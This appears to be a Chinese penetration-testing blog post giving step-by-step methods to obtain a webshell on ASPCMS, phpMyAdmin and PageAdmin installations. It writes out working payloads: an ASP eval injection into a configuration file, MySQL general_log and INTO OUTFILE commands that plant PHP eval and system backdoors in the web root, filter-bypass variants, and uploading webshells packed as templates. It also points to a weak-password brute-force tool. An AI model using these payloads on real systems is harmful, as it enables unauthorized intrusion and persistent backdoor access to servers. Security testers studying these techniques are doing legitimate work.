ASPCMS273 PhPMyadmin Pageadmin拿shell

starhei.zxy2024-08-04 12:33

一、ASPCMS

ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。

1.后台修改配置文件拿Shell

步骤一:访问并登陆到后台(这里注意在搭建站点的时候注意权限问题)

#网站后台http://192.168.4.139/admin_aspcms/login.asp

username:admin

password:123456

2.点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包

3.在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容

#字段值

1%25><%25Eval(Request(chr(65)))25><%25 密码是a

#影响文件

/config/AspCms_Config.asp

4.访问以下地址进行连接.

http://192.168.233.141:81/config/AspCms_Config.asp

二、PhPMyadmin

1.通过日志文件拿Shell

利用mysql日志文件写shell,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

show global variables like '%general%';

set global general_log='on'; //⽇志保存状态开启;

set global general_log_file = 'D:/phpstudy_pro/WWW/mafa.php' //修 改⽇志的保存位置。

show global variables like '%general%';

select '<?php eval($_POST["admin"]);?>';

bypass:

select+'<?php+phpinfo();+?>'

select+'<?php+//%0Aphpinfo();+?>'

2.导入导出拿WebShell

1.⾸先判断mysql位置

select @@datadir

路径:D:\phpstudy_pro\Extensions\MySQL5.7.26\data\

2.猜测web路径 猜测web路径:

D:\phpstudy_pro\\www

D:\phpstudy_pro\\WWW\web.php

3.写webshell

select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/www/b.php';

select "<?php+//%0Aeval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/www/b.php';

select "<?php system($_GET[a]);?>" into outfile 'D:/phpstudy_pro/PHPTutorial/www/d.php';

4.浏览器

http://192.168.2.8/d.php?a=dir ..\ select "?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW \web.php';

备注:/

不要⽤\,如⾥要⽤\\(转义)

3.界⾯图像化GetShell

如果过滤了 into outfile 第⼀种的图形化操作

复制代码 
phpmyadmin管理台
变量:⽇志 搜索:gen
log:on
file:C:\phpStudy\PHPTutorial\www\c.php
sql:
select "<?php eval($_POST[a]);?>";

GitHub - MzzdToT/phpmyadmin_fuzz: phpmyadmin批量弱口令爆破。

三、Pageadmin

PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为 企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。

姿势⼀:上传模块拿WebShell

在pageadmin后台可以上传模板,把webshell打包成zip上传模板,系统会⾃动解压,成功会 在后台存在后⻔,访问即可获取webshell 。

步骤⼀:访问 pageadmin 在后台可以上传模板,把webshell打包成zip上传模板,系统会⾃动解压, 成功会在后台存在后⻔,访问即可获取webshell 。 点击【应⽤】--》【 插件安装】--》【 上传⽂件

复制代码 
这⾥因为不是授权版本,⽆法上传,如果有授权版本的话就可以成功上传,上传后系统会⾃动解压,直
接访问shell地址就可以了:/Templates/shell/shell.aspx

姿势⼆:上传⽂件解压拿WebShell

点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】--》 【解压】

文件上传哥斯拉生成的

getshell

相关推荐
BingoGo8 小时前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php
JaguarJack9 小时前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php·服务端
BingoGo1 天前
OpenSwoole 26.2.0 发布:支持 PHP 8.5、io_uring 后端及协程调试改进
后端·php
JaguarJack1 天前
OpenSwoole 26.2.0 发布:支持 PHP 8.5、io_uring 后端及协程调试改进
后端·php·服务端
JaguarJack2 天前
推荐 PHP 属性(Attributes) 简洁读取 API 扩展包
后端·php·服务端
BingoGo2 天前
推荐 PHP 属性(Attributes) 简洁读取 API 扩展包
php
JaguarJack3 天前
告别 Laravel 缓慢的 Blade!Livewire Blaze 来了,为你的 Laravel 性能提速
后端·php·laravel
郑州光合科技余经理4 天前
代码展示:PHP搭建海外版外卖系统源码解析
java·开发语言·前端·后端·系统架构·uni-app·php
feifeigo1234 天前
matlab画图工具
开发语言·matlab
dustcell.4 天前
haproxy七层代理
java·开发语言·前端
热门推荐
01GitHub 镜像站点02【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆03OpenClaw 使用和管理 MCP 完全指南04OpenClaw + 飞书(Feishu)环境搭建指南05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06OpenClaw优化飞书API 额度已耗尽问题07Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤08Window 10部署openclaw报错node.exe : npm error code 12809OpenClaw大龙虾机器人完整安装教程10OpenClaw 接入阿里云百炼 Coding Plan 指南